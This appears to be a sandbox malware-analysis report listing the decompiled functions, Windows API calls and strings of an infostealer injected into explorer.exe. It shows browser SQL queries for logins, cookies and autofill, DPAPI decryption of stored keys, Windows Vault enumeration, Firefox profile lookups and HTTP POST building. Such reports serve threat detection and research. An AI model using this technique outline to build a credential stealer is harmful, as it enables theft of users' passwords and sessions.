Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
API String ID: 584740257-404540950
Opcode ID: 75d1ef4be3ba62f609af73c06c8a22cc8c18686abe529c42bdd63fa3b212714f
Instruction ID: f3fc50ca1f04787e8c570c95102dc0e0f18fdf6fbb0cc1ee03fe35651f9ca419
Opcode Fuzzy Hash: 75d1ef4be3ba62f609af73c06c8a22cc8c18686abe529c42bdd63fa3b212714f
Instruction Fuzzy Hash: 93E17670208341AFEB61DB28CC84A2BBBE9FF85365F44492CF985D7291EB75C904CB52

Function 00802198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(?,00000114), ref: 008021AF
GetVersionExW.KERNEL32(?), ref: 008021BE
LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 008021E8
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0080220A
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 00802214
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00802220
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0080222A
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00802236
RtlCompareMemory.NTDLL(?,00861110,00000010), ref: 008022E8
RtlCompareMemory.NTDLL(?,00861110,00000010), ref: 0080236C

Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994

StrStrIW.SHLWAPI(?,Internet Explorer), ref: 008023FE
FreeLibrary.KERNELBASE(00000000), ref: 00802493

Strings

VaultGetItem, xrefs: 00802222
VaultFree, xrefs: 0080222C
VaultEnumerateItems, xrefs: 00802216
VaultCloseVault, xrefs: 0080220C
Internet Explorer, xrefs: 008023F8
vaultcli.dll, xrefs: 008021E3
VaultOpenVault, xrefs: 00802204

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2583887280-2831467701
Opcode ID: ffa59101296c5b02a7ad67e6b061039ac6ed3d5a45b3109ca99f12ac92971152
Instruction ID: 2eb6ba1632d1eb56523cecb6c34d845a69a6d74b998298385e88b12553fe5c5b
Opcode Fuzzy Hash: ffa59101296c5b02a7ad67e6b061039ac6ed3d5a45b3109ca99f12ac92971152
Instruction Fuzzy Hash: C9917571A083019FDB58DF65CC88A2BBBE9FF98704F40482DF995D7291EAB4D805CB42

Function 00803098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00801B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
Part of subcall function 00801B6A: CloseHandle.KERNELBASE(00000000), ref: 00801B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 008030F9
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00803103
DeleteFileW.KERNELBASE(00000000), ref: 0080310A
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00803115
RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 008031A4
RtlZeroMemory.NTDLL(?,00000040), ref: 008031D7
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008032DF
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0080339C

Strings

SELECT origin_url,username_value,password_value FROM logins, xrefs: 00803136
@, xrefs: 008031F1
v1, xrefs: 0080318A
0, xrefs: 00803191

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
API String ID: 2757140130-4052020286
Opcode ID: 002d93b67b561cd551769174205fba6a8dc2b197bb6661dbc5c97f1d2d8c2ac9
Instruction ID: a9c7c23f5bbff027d0cd293ce87033b761df174523df89988dd8a3fb005fc407
Opcode Fuzzy Hash: 002d93b67b561cd551769174205fba6a8dc2b197bb6661dbc5c97f1d2d8c2ac9
Instruction Fuzzy Hash: E1919670208341ABDB919F28DC84A2FBBE9FF85755F04492DF985D32A1DB34DA048B23

Function 00803ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 00803F0A
FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00803F16
lstrcmpiW.KERNEL32(?,008562CC), ref: 00803F38
lstrcmpiW.KERNEL32(?,008562D0), ref: 00803F4C
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00803F69
lstrcmpiW.KERNEL32(?,Local State), ref: 00803F7E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00803F9B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00803FB5
FindClose.KERNELBASE(00000000), ref: 00803FC4

Strings

Local State, xrefs: 00803F78
*.*, xrefs: 00803F01

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
String ID: *.*$Local State
API String ID: 3923353463-3324723383
Opcode ID: 0214a0c806dbe5743da91bacb5d09593d6aec333e592c00b8e1235d05edacd5d
Instruction ID: 371d45c1242b5fbee66a57b3ac8c0b02cef52bbce09ccf4102a636bf79242c54
Opcode Fuzzy Hash: 0214a0c806dbe5743da91bacb5d09593d6aec333e592c00b8e1235d05edacd5d
Instruction Fuzzy Hash: 6821B030600B456BE790BB349C4CA3B76BCFB81752F840529F952C32D2FF7C99588662

Function 00802B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994

FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 00802B3D
lstrcmpiW.KERNEL32(?,008562CC), ref: 00802B63
lstrcmpiW.KERNEL32(?,008562D0), ref: 00802B7B

Part of subcall function 008019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00802CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 008019C4

StrStrIW.SHLWAPI(00000000,logins.json), ref: 00802BE7
StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00802C16
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00802C43
FindClose.KERNELBASE(00000000), ref: 00802C52

Strings

logins.json, xrefs: 00802BE1
cookies.sqlite, xrefs: 00802C10
\*.*, xrefs: 00802B15

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
String ID: \*.*$cookies.sqlite$logins.json
API String ID: 1108783765-3717368146
Opcode ID: d04d673d4ca8a8abb742ae0d80be0df8476515d24161e36d97e262f8dde32171
Instruction ID: d1a4a7d08c38de56b72a0d63a7476ee82f897f5c75453001fb28e6921f4fd087
Opcode Fuzzy Hash: d04d673d4ca8a8abb742ae0d80be0df8476515d24161e36d97e262f8dde32171
Instruction Fuzzy Hash: 4B31A1303043058BDB94AB788C9DA3E779AFB84311B84492CB956D32C2FBB8CD199252

Function 00801D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00802CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 008019C4

FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 00801DA9
lstrcmpiW.KERNEL32(?,008562CC), ref: 00801DCF
lstrcmpiW.KERNEL32(?,008562D0), ref: 00801DE7
lstrcmpiW.KERNEL32(?,?), ref: 00801E62

Part of subcall function 00801CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,00802C27), ref: 00801D02
Part of subcall function 00801CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00801D0D

FindNextFileW.KERNELBASE(00000000,00000010), ref: 00801E94
FindClose.KERNELBASE(00000000), ref: 00801EA3

Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994

Strings

*.*, xrefs: 00801D8B
\*.*, xrefs: 00801D79

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
String ID: *.*$\*.*
API String ID: 232625764-1692270452
Opcode ID: 098505708471225806d763ceb4b1ba418e29de2b0eb0b6a50ebed917a2c86bc4
Instruction ID: 9355e8f6ebee4f0efeaf71521591187e828377a026acaaf2ddeab23030a2a4e4
Opcode Fuzzy Hash: 098505708471225806d763ceb4b1ba418e29de2b0eb0b6a50ebed917a2c86bc4
Instruction Fuzzy Hash: DD3172303043419BCF91AB748C9CA6F7AE9FF84361F804A29ED4AC32D1EB7588598752

Function 00803E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00801B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
Part of subcall function 00801B6A: CloseHandle.KERNELBASE(00000000), ref: 00801B8F

Part of subcall function 00801C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00803E1E,00000000,?,00803FA8), ref: 00801C46
Part of subcall function 00801C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,00803FA8), ref: 00801C56
Part of subcall function 00801C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00803FA8), ref: 00801C76
Part of subcall function 00801C31: CloseHandle.KERNEL32(00000000,?,00803FA8), ref: 00801C91

Part of subcall function 00802FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00803E30,00000000,00000000,?,00803FA8), ref: 00802FC1
Part of subcall function 00802FB1: lstrlen.KERNEL32("encrypted_key":",?,00803FA8), ref: 00802FCE
Part of subcall function 00802FB1: StrStrIA.SHLWAPI("encrypted_key":",0085692C,?,00803FA8), ref: 00802FDD

Part of subcall function 0080123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00803E4B,00000000), ref: 0080124A
Part of subcall function 0080123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00801268
Part of subcall function 0080123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00801295

RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 00803E74
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00803E9E

Strings

, xrefs: 00803EA8
IDPAP, xrefs: 00803E6E, 00803E72
DPAP, xrefs: 00803E52
DPAP, xrefs: 00803E5A

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
String ID: $DPAP$DPAP$IDPAP
API String ID: 3076719866-957854035
Opcode ID: 0c9a71f6c9dd6d32bf1e80a77abb3408d06bb78beb86571a03cd0b67193d9ee9
Instruction ID: 82945679c52c084d7a080454022275af3027d20138a0a3b4f0302a2b51b54514
Opcode Fuzzy Hash: 0c9a71f6c9dd6d32bf1e80a77abb3408d06bb78beb86571a03cd0b67193d9ee9
Instruction Fuzzy Hash: 9E219F72604345ABDB61EA68CC84A6FB2DDFB84710F44062DF941D7281EB74CE498793

Function 00804B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00801162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0080116F

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00804BB6
NtUnmapViewOfSection.NTDLL(000000FF), ref: 00804BBF

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: c854e9098fccac621fa97ed1b583eb8b1b9572b12d06d99ae585722660bf5aec
Instruction ID: 4f6c0e95b985954e5531b6db325bd5c1f8f84b68c19023a048052461bbf220ea
Opcode Fuzzy Hash: c854e9098fccac621fa97ed1b583eb8b1b9572b12d06d99ae585722660bf5aec
Instruction Fuzzy Hash: 46E0927154121067CA98BBB4BC2DA4A3B58FB91371F109554F265D20D1DA3588408651

Function 00806512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(008620A4,00000001,00000000,0000000A,00853127,008028DA,00000000,?), ref: 0080BFFC

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 9e5f32f2fb000d9b9eac91c10059ff592e2546d0644fa7ddd3acbed61f4f3467
Instruction ID: 57a135096312b090adc0985e3ef2d3a17dded0f1019ad75980eeda60286a7794
Opcode Fuzzy Hash: 9e5f32f2fb000d9b9eac91c10059ff592e2546d0644fa7ddd3acbed61f4f3467
Instruction Fuzzy Hash: 81E0ED3178470035EA903ABC6C0BF161555FF81B01F699525B720E91CBEF9981701027

Function 00803C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00801B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
Part of subcall function 00801B6A: CloseHandle.KERNELBASE(00000000), ref: 00801B8F

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

GetTempPathW.KERNEL32(00000104,00000000), ref: 00803C6A
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00803C76
DeleteFileW.KERNELBASE(00000000), ref: 00803C7D
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 00803C89
lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00803D2F
lstrlen.KERNEL32(00000000), ref: 00803D36
wsprintfA.USER32 ref: 00803D55
lstrlen.KERNEL32(00000000), ref: 00803D61
lstrcat.KERNEL32(00000000,?), ref: 00803D89
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00803DB2
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00803DED

Strings

AUTOFILL, xrefs: 00803DBD, 00803DC2, 00803DCC
SELECT name,value FROM autofill, xrefs: 00803CAA
%s = %s, xrefs: 00803D4F

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
API String ID: 2923052733-3488123210
Opcode ID: 061f98764f594a21738498a06d581d89e0cb0b5a5f0c34b65718cc876680fa30
Instruction ID: 6b74447527f89df3bae87de9cc5975402af516c434c6fff097c197b49308cb80
Opcode Fuzzy Hash: 061f98764f594a21738498a06d581d89e0cb0b5a5f0c34b65718cc876680fa30
Instruction Fuzzy Hash: 7D417B30604341ABDB51AB788C85A3F7AADFF85765F400829F985E3292DA39DD058B62

Function 008028F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 00802AD2

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 008029E1
lstrlen.KERNEL32(00000000), ref: 008029EC
wsprintfA.USER32 ref: 00802A38
lstrlen.KERNEL32(00000000), ref: 00802A44
lstrcat.KERNEL32(00000000,00000000), ref: 00802A6C
lstrlen.KERNEL32(00000000,?,?), ref: 00802A99

Strings

FALSE, xrefs: 00802A06
COOKIES, xrefs: 00802AA4, 00802AAB, 00802AB1
%sTRUE%s%s%s%s%s, xrefs: 00802A32
TRUE, xrefs: 00802A13

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
API String ID: 304071051-2605711689
Opcode ID: 4abb796801e73fb327b924a027b14a2cc70124872d58e81dfdded2e729935a8b
Instruction ID: fcc800745ca9045383cc57dd18e148b39cd2538dced4552dd3f441cc64b89a35
Opcode Fuzzy Hash: 4abb796801e73fb327b924a027b14a2cc70124872d58e81dfdded2e729935a8b
Instruction Fuzzy Hash: 5451CD302043468FDB65EF249C58A3E7ADAFF85315F44082DF881DB292EB79DC098B52

Function 00802CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00801953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00802F0C), ref: 00801973
Part of subcall function 00801953: lstrlenW.KERNEL32(00856564,?,?,00802F0C), ref: 00801978
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,?,?,?,00802F0C), ref: 00801990
Part of subcall function 00801953: lstrcatW.KERNEL32(00000000,00856564,?,?,00802F0C), ref: 00801994

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

Part of subcall function 00801B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00802893,00000000,00000000,00000000,?), ref: 00801B82
Part of subcall function 00801B6A: CloseHandle.KERNELBASE(00000000), ref: 00801B8F

GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00802D13
StrStrIW.SHLWAPI(00000000,Profile), ref: 00802D45
GetPrivateProfileStringW.KERNEL32(00000000,Path,0085637C,?,00000FFF,?), ref: 00802D68
GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00802D7B
lstrlenW.KERNEL32(00000000), ref: 00802DD8

Strings

Profile, xrefs: 00802D3F
profiles.ini, xrefs: 00802CCD
IsRelative, xrefs: 00802D75
Path, xrefs: 00802D62

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 2234428054-4107377610
Opcode ID: 04f90d08370c465fb1374671c17e9d5fd4bbc2fd8d56d72514450048b33f04ff
Instruction ID: c8ea8c24a32400b7a5b31328f5b3e81c4a9d23c863adf1cb26c56cc630ced20f
Opcode Fuzzy Hash: 04f90d08370c465fb1374671c17e9d5fd4bbc2fd8d56d72514450048b33f04ff
Instruction Fuzzy Hash: CD319C307043069BDBA0AB348C1963FB6A2FBC5711F504429F946E72D2EEB98C569752

Function 00801333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A

Part of subcall function 0080106C: lstrlen.KERNEL32(009A711E,00000000,00000000,00000000,00801366,74DE8A60,009A711E,00000000), ref: 00801074
Part of subcall function 0080106C: MultiByteToWideChar.KERNEL32(00000000,00000000,009A711E,00000001,00000000,00000000), ref: 00801086

Part of subcall function 008012A3: RtlZeroMemory.NTDLL(?,00000018), ref: 008012B5

RtlZeroMemory.NTDLL(?,0000003C), ref: 008013C2
wsprintfW.USER32 ref: 008014B5
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00801594

Strings

Accept: */*Referer: %S, xrefs: 008014AF
Content-Type: application/x-www-form-urlencoded, xrefs: 008014FB
POST, xrefs: 00801465

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: 7fc3fbf7d1105d7b97aba91d639164c0a5452ec76e7c8d4786ce5cf6405a3842
Instruction ID: 16b4ed8f0f5cd9ef1e117c8a7801aecc26cf76a4776d03a4296e85456542eb37
Opcode Fuzzy Hash: 7fc3fbf7d1105d7b97aba91d639164c0a5452ec76e7c8d4786ce5cf6405a3842
Instruction Fuzzy Hash: A4716B70608701AFDB909F68DC88A2BBBE9FB88355F40092DF995D7291EB74DD048B52

Function 0080B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0080B31D
MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0080B34F

Strings

winShmMap1, xrefs: 0080B278
winShmMap3, xrefs: 0080B399
winShmMap2, xrefs: 0080B2CF

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: File$CreateMappingView
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 3452162329-3826999013
Opcode ID: 067c480d939a45935c946aa9e49aa5a4f687cb7b8b37a0836c12e76ef192b91b
Instruction ID: 54421e6c99b99dad515edf5905306636cb84db5183d47e30d0b85af4834f524e
Opcode Fuzzy Hash: 067c480d939a45935c946aa9e49aa5a4f687cb7b8b37a0836c12e76ef192b91b
Instruction Fuzzy Hash: 35518B712047419FDB65CF18CC45A2AB7E6FB88314F25882EE992CB3D1DBB0E815CB52

Function 0080A40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(?,?,?), ref: 0080A455
memcpy.NTDLL(?,?,?), ref: 0080A479
ReadFile.KERNELBASE(?,?,?,?,?), ref: 0080A4DB
memset.NTDLL ref: 0080A546

Strings

winRead, xrefs: 0080A515

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_801000_explorer.jbxd

Similarity

API ID: memcpy$FileReadmemset
String ID: winRead
API String ID: 2051157613-2759563040
Opcode ID: 2640a25a4757365f520bf036292306143f2baf7c676591687f6651bb5200131f
Instruction ID: 8c9fda76a29acd87857245622d0d2967441843ac316cca334dced91b5738b6da
Opcode Fuzzy Hash: 2640a25a4757365f520bf036292306143f2baf7c676591687f6651bb5200131f
Instruction Fuzzy Hash: 3C318976208304ABD784DE68CC8599F77AAFFC8310F845928F895C7291E6B0EC048B97

Function 00802E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(?,?), ref: 00802E4B
RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00802EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00802F54
RegCloseKey.KERNELBASE(?), ref: 00802F62

Part of subcall function 008019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A1E
Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A3C
Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A75
Part of subcall function 008019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A98

Part of subcall function 00801BC5: lstrlenW.KERNEL32(00000000,00000000,?,00802E75,PathToExe,00000000,00000000), ref: 00801BCC
Part of subcall function 00801BC5: StrStrIW.SHLWAPI(00000000,.exe,?,00802E75,PathToExe,00000000,00000000), ref: 00801BF0
Part of subcall function 00801BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00802E75,PathToExe,00000000,00000000), ref: 00801C05
Part of subcall function 00801BC5: lstrlenW.KERNEL32(00000000,?,00802E75,PathToExe,00000000,00000000), ref: 00801C1C

Part of subcall function 00801AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00802E83,PathToExe,00000000,00000000), ref: 00801B16

Strings

PathToExe, xrefs: 00802E5E

Memory Dump Source

Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false

